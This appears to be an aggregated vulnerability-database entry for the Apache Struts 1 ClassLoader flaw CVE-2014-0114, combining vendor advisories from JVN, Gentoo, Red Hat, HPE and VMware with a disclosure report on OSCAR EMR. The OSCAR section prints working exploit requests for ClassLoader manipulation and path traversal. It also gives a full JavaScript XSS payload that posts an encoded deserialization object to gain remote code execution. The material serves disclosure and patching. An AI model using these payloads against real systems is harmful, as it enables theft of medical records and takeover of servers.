ID

VAR-201404-0288


CVE

CVE-2014-0114


TITLE

OpenClinic GA  Multiple vulnerabilities in

Trust: 0.8

sources: JVNDB: JVNDB-2020-006468

DESCRIPTION

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. An information management system for hospitals that can manage data such as financial management, clinical practice, and pharmacies. OpenClinic GA There are multiple vulnerabilities in. OpenClinic GA The following vulnerabilities exist in. * Avoid authentication via another path or channel (CWE-288) - CVE-2020-14485* Inappropriate restriction of excessive authentication attempts (CWE-307) - CVE-2020-14484* Improper authentication (CWE-287) - CVE-2020-14494* Lack of certification (CWE-862) - CVE-2020-14491* Execution with unnecessary privileges (CWE-250) - CVE-2020-14493* Unlimited upload of dangerous types of files (CWE-434) - CVE-2020-14488* Path traversal (CWE-22) - CVE-2020-14490* Inappropriate authorization process (CWE-285) - CVE-2020-14486* Cross-site scripting (CWE-79) - CVE-2020-14492* Use of unmaintained third-party products (CWE-1104) - CVE-2020-14495 , CVE-2016-1181 , CVE-2016-1182 Due to * Inadequate protection of credentials (CWE-522) - CVE-2020-14489* Hidden features (CWE-912) - CVE-2020-14487 * However, this vulnerability is Version 5.89.05b Does not affectThe expected impact depends on each vulnerability, but it may be affected as follows. * A remote attacker initiates a session by bypassing client-side access control or sending a specially crafted request. SQL Performs administrator functions such as query execution - CVE-2020-14485* A remote attacker bypasses the system's account lock feature and brute force attacks ( Brute force attack ) Is executed - CVE-2020-14484* In this system, brute force attack ( Brute force attack ) Insufficient protection mechanism allows an unauthenticated attacker to access the system with more than the maximum number of attempts. - CVE-2020-14494* The system SQL Since it does not check the execution permission of the query, a user with lower permission can access information that requires higher permission. - CVE-2020-14491* In this system, with relatively low authority SQL It is possible to write any file by executing, and as a result, any command is executed on the system. - CVE-2020-14493* The system does not properly validate uploaded files, so a low-privileged attacker uploads and executes arbitrary files on the system. - CVE-2020-14488* Executing a file that contains any local file specified by a parameter exposes sensitive information or executes an uploaded malicious file. - CVE-2020-14490* By avoiding the redirect process that is executed when authentication fails, an unauthenticated attacker can execute a command illegally. - CVE-2020-14486* Malicious code is executed on the user's browser because the user's input value is not properly validated. - CVE-2020-14492* Known vulnerabilities in end-of-support third-party software used by the system (CVE-2014-0114 , CVE-2016-1181 , CVE-2016-1182) Malicious code executed by a remote attacker due to * There is a flaw in the hashing process when saving the password, and the password is stolen by a dictionary attack. - CVE-2020-14489* A user account set by default exists in the system in an accessible state, and an attacker can use that account to execute arbitrary commands. - CVE-2020-14487. Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 1.0.0 through 1.3.10 are vulnerable. Summary: Fuse ESB Enterprise 7.1.0 R1 P4 (Patch 4 on Rollup Patch 1), a security update that addresses one security issue, is now available from the Red Hat Customer Portal. A remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. (CVE-2014-0114) Refer to the readme.txt file included with the patch files for installation instructions. Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell ----- Product Description: "OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMRas ISO 13485:2003 certified Quality Management System." ----- Timeline: 29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed ----- Contents: This report uses OVE identifiers: http://www.openwall.com/ove/ OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery ----- Issue details: === OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency === OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114. An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz An unauthenticated attacker is prevented from doing likewise by the aLoginFiltera servlet filter, but can still carry out a denial-of-service attack impeding any access to the application until Tomcat is restarted by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid === OVE-20160329-0003: Remote code execution via unsafe object deserialization === TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial. In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception aorg.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defineda, but were it to be accessible, it would be vulnerable as well. === OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface === logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003: var decodedBase64 = atob("H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA=="); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData); XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested) === OVE-20160329-0007: SQL injection === On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators. === OVE-20160329-0008: Path traversal === ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename). Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp === OVE-20160329-0002: Insecure direct object reference in document manager === ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private. === OVE-20160329-0005: Denial of service via resource exhaustion === uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition). === OVE-20160329-0006: Insecure password storage === Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack. === OVE-20160329-0009: Cross-site request forgery === The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004. Workaround ========== There is no known workaround at this time. Resolution ========== All Commons BeanUtils users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2" References ========== [ 1 ] CVE-2014-0114 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201607-09 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Summary: Red Hat A-MQ Broker 7.5 is now available from the Red Hat Customer Portal. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Description: AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. This release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red Hat A-MQ Broker 7.4.1, and includes security and bug fixes, and enhancements. Security Fix(es): * Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Solution: Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on. Bugs fixed (https://bugzilla.redhat.com/): 1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters 5. JIRA issues fixed (https://issues.jboss.org/): ENTMQBR-2849 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters [amq-7.4.0] 6. References: https://access.redhat.com/security/cve/CVE-2014-0114 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.5.0 https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/ 7. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c05324755 Version: 1 HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2016-11-04 Last Updated: 2016-11-04 Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS) Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified in HPE SiteScope. The vulnerabilities could be exploited to allow local elevation of privilege and exploited remotely to allow denial of service, arbitrary code execution, cross-site request forgery. References: - CVE-2014-0114 - Apache Struts, execution of arbitrary code - CVE-2016-0763 - Apache Tomcat, denial of service (DoS) - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions - CVE-2015-3253 - Apache Groovy, execution of arbitrary code - CVE-2015-5652 - Python, elevation of privilege - CVE-2013-6429 - Spring Framework, cross-site request forgery - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS) - PSRT110264 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - HP SiteScope Monitors Software Series 11.2xa11.32IP1 BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2013-6429 6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) CVE-2014-0050 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2014-0107 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2014-0114 6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2015-3253 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2015-5652 8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) CVE-2016-0763 6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Information on CVSS is documented in HPE Customer Notice HPSN-2008-002 here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499 RESOLUTION HPE has provided a resolution via an update to HPE SiteScope. Details on the update and each vulnerability are in the KM articles below. **Note:** The resolution for each vulnerability listed is to upgrade to SiteScope 11.32IP2 or an even more recent version of SiteScope if available. The SiteScope update can be can found in the personal zone in "my updates" in HPE Software Support Online: <https://softwaresupport.hpe.com>. * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02550251> * Apache Struts: KM02553983 (CVE-2014-0114): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553983> * Apache Tomcat: KM02553990 (CVE-2016-0763): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553990> * Apache XML Xalan: KM02553991 (CVE-2014-0107): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553991> * Apache Groovy: KM02553992 (CVE-2015-3253): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553992> * Python: KM02553997 (CVE-2015-5652): * <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553997> * Spring Framework: KM02553998 (CVE-2013-6429): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553998> HISTORY Version:1 (rev.1) - 4 November 2016 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2016 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ VMware Security Advisory Advisory ID: VMSA-2014-0008 Synopsis: VMware vSphere product updates to third party libraries Issue date: 2014-09-09 Updated on: 2014-09-09 (Initial Advisory) CVE numbers: --- Struts --- CVE-2014-0114 --- tc-server --- CVE-2013-4590, CVE-2013-4322, and CVE-2014-0050 --- glibc --- CVE-2013-0242 and CVE-2013-1914 --- JRE --- See references - ------------------------------------------------------------------------ 1. Summary VMware has updated vSphere third party libraries 2. Relevant releases VMware vCenter Server 5.5 prior to Update 2 VMware vCenter Update Manager 5.5 prior to Update 2 VMware ESXi 5.5 without patch ESXi550-201409101-SG 3. Problem Description a. This issue may lead to remote code execution after authentication. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2014-0114 to this issue. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======= ======= ================= vCenter Server 5.5 any 5.5 Update 2 vCenter Server 5.1 any Patch Pending vCenter Server 5.0 any Patch Pending b. vCenter Server tc-server 2.9.5 / Apache Tomcat 7.0.52 updates tc-server has been updated to version 2.9.5 to address multiple security issues. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifiers CVE-2013-4590, CVE-2013-4322, and CVE-2014-0050 to these issues. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======= ======= ================= vCenter Server 5.5 any 5.5 Update 2 vCenter Server 5.1 any Patch Pending vCenter Server 5.0 any Patch Pending c. Update to ESXi glibc package glibc is updated to address multiple security issues. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifiers CVE-2013-0242 and CVE-2013-1914 to these issues. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======= ======= ================= ESXi 5.5 any ESXi550-201409101-SG ESXi 5.1 any Patch Pending ESXi 5.0 any Patch Pending d. vCenter and Update Manager, Oracle JRE 1.7 Update 55 Oracle has documented the CVE identifiers that are addressed in JRE 1.7.0 update 55 in the Oracle Java SE Critical Patch Update Advisory of April 2014. The References section provides a link to this advisory. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======= ======= ================= vCenter Server 5.5 any 5.5 Update 2 vCenter Server 5.1 any not applicable * vCenter Server 5.0 any not applicable * vCenter Update Manager 5.5 any 5.5 Update 2 vCenter Update Manager 5.1 any not applicable * vCenter Update Manager 5.0 any not applicable * * this product uses the Oracle JRE 1.6.0 family * 4. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. vCenter Server and Update Manager 5.5u2 --------------------------------------- Downloads and Documentation: https://www.vmware.com/go/download-vsphere ESXi 5.5 -------- Download: https://www.vmware.com/patchmgr/findPatch.portal 5. References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4590 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1914 JRE --- Oracle Java SE Critical Patch Update Advisory of April 2014 http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html - ------------------------------------------------------------------------ 6. Change log 2014-09-09 VMSA-2014-0008 Initial security advisory in conjunction with the release of vSphere 5.5 Update 2 on 2014-09-09. - ------------------------------------------------------------------------ 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: security-announce at lists.vmware.com bugtraq at securityfocus.com fulldisclosure at seclists.org E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html Twitter https://twitter.com/VMwareSRC Copyright 2014 VMware Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: Encryption Desktop 10.3.0 (Build 8741) Charset: utf-8 wj8DBQFUD2LADEcm8Vbi9kMRAp0lAKCCB15Aa21ThBMqWRJTeYEweSVrdQCaAsNC he8AihUDo3UB9amCBiImxq0= =W0+t -----END PGP SIGNATURE----- . References: CVE-2014-0114, SSRT101566 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Mitigation information for the Apache Struts vulnerability (CVE-2014-0114) is available at the following location: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-a pplications/ba-p/6463188#.U2J7xeaSxro Japanese information is available at the following location: http://www.hp.com/jp/icewall_patchaccess Note: The HP IceWall product is only available in Japan. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein

Trust: 3.42

sources: NVD: CVE-2014-0114 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // BID: 67121 // VULMON: CVE-2014-0114 // PACKETSTORM: 126619 // PACKETSTORM: 149050 // PACKETSTORM: 137980 // PACKETSTORM: 154792 // PACKETSTORM: 128873 // PACKETSTORM: 139721 // PACKETSTORM: 128211 // PACKETSTORM: 126811

AFFECTED PRODUCTS

vendor:apachemodel:strutsscope:eqversion:1.2.4

Trust: 1.9

vendor:apachemodel:strutsscope:eqversion:1.2.7

Trust: 1.9

vendor:apachemodel:strutsscope:eqversion:1.2.6

Trust: 1.9

vendor:apachemodel:strutsscope:eqversion:1.3.10

Trust: 1.9

vendor:apachemodel:strutsscope:eqversion:1.2.2

Trust: 1.9

vendor:apachemodel:strutsscope:eqversion:1.1

Trust: 1.9

vendor:apachemodel:strutsscope:eqversion:1.3.5

Trust: 1.9

vendor:apachemodel:strutsscope:eqversion:1.2.8

Trust: 1.9

vendor:apachemodel:strutsscope:eqversion:1.3.8

Trust: 1.9

vendor:apachemodel:strutsscope:eqversion:1.2.9

Trust: 1.9

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-00-00

Trust: 1.8

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-50-03

Trust: 1.5

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-50-00

Trust: 1.5

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-10-10

Trust: 1.5

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-00-12

Trust: 1.5

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-50-13

Trust: 1.5

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-50-00

Trust: 1.5

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-10-00-03

Trust: 1.5

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-10-00-00

Trust: 1.5

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-10-00

Trust: 1.5

vendor:apachemodel:strutsscope:eqversion:1.0.2

Trust: 1.3

vendor:hitachimodel:tiered storage manager software -00 )scope:eqversion:7.1.1

Trust: 1.2

vendor:hitachimodel:tiered storage manager software )scope:eqversion:7.3-00

Trust: 1.2

vendor:ibmmodel:connectionsscope:eqversion:4.0

Trust: 1.1

vendor:ibmmodel:connectionsscope:eqversion:4.5

Trust: 1.1

vendor:ibmmodel:websphere portalscope:eqversion:8.0

Trust: 1.1

vendor:ibmmodel:connectionsscope:eqversion:5.0

Trust: 1.1

vendor:ibmmodel:content collectorscope:eqversion:2.2

Trust: 1.1

vendor:ibmmodel:websphere portalscope:eqversion:8.5

Trust: 1.1

vendor:apachemodel:commons beanutilsscope:lteversion:1.9.1

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.0

Trust: 1.0

vendor:hitachimodel:device manager software -00 )scope:eqversion:7.3

Trust: 0.9

vendor:hitachimodel:device manager software )scope:eqversion:7.4-00

Trust: 0.9

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-11-00

Trust: 0.9

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-00-00

Trust: 0.9

vendor:openclinic gamodel:openclinic gascope:eqversion: -

Trust: 0.8

vendor:openclinic gamodel:openclinic gascope:eqversion:version 5.09.02

Trust: 0.8

vendor:openclinic gamodel:openclinic gascope:eqversion:version 5.89.05b

Trust: 0.8

vendor:apachemodel:strutsscope:eqversion:1.x to 1.3.10

Trust: 0.8

vendor:富士通model:クラウド インフラ マネージメント ソフトウェアscope: - version: -

Trust: 0.8

vendor:富士通model:fujitsu integrated system ha database readyscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:business analytics modeling server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:business process manager analytics

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:mobile manager

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:extreme transaction processing server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:navigator explorer server

Trust: 0.8

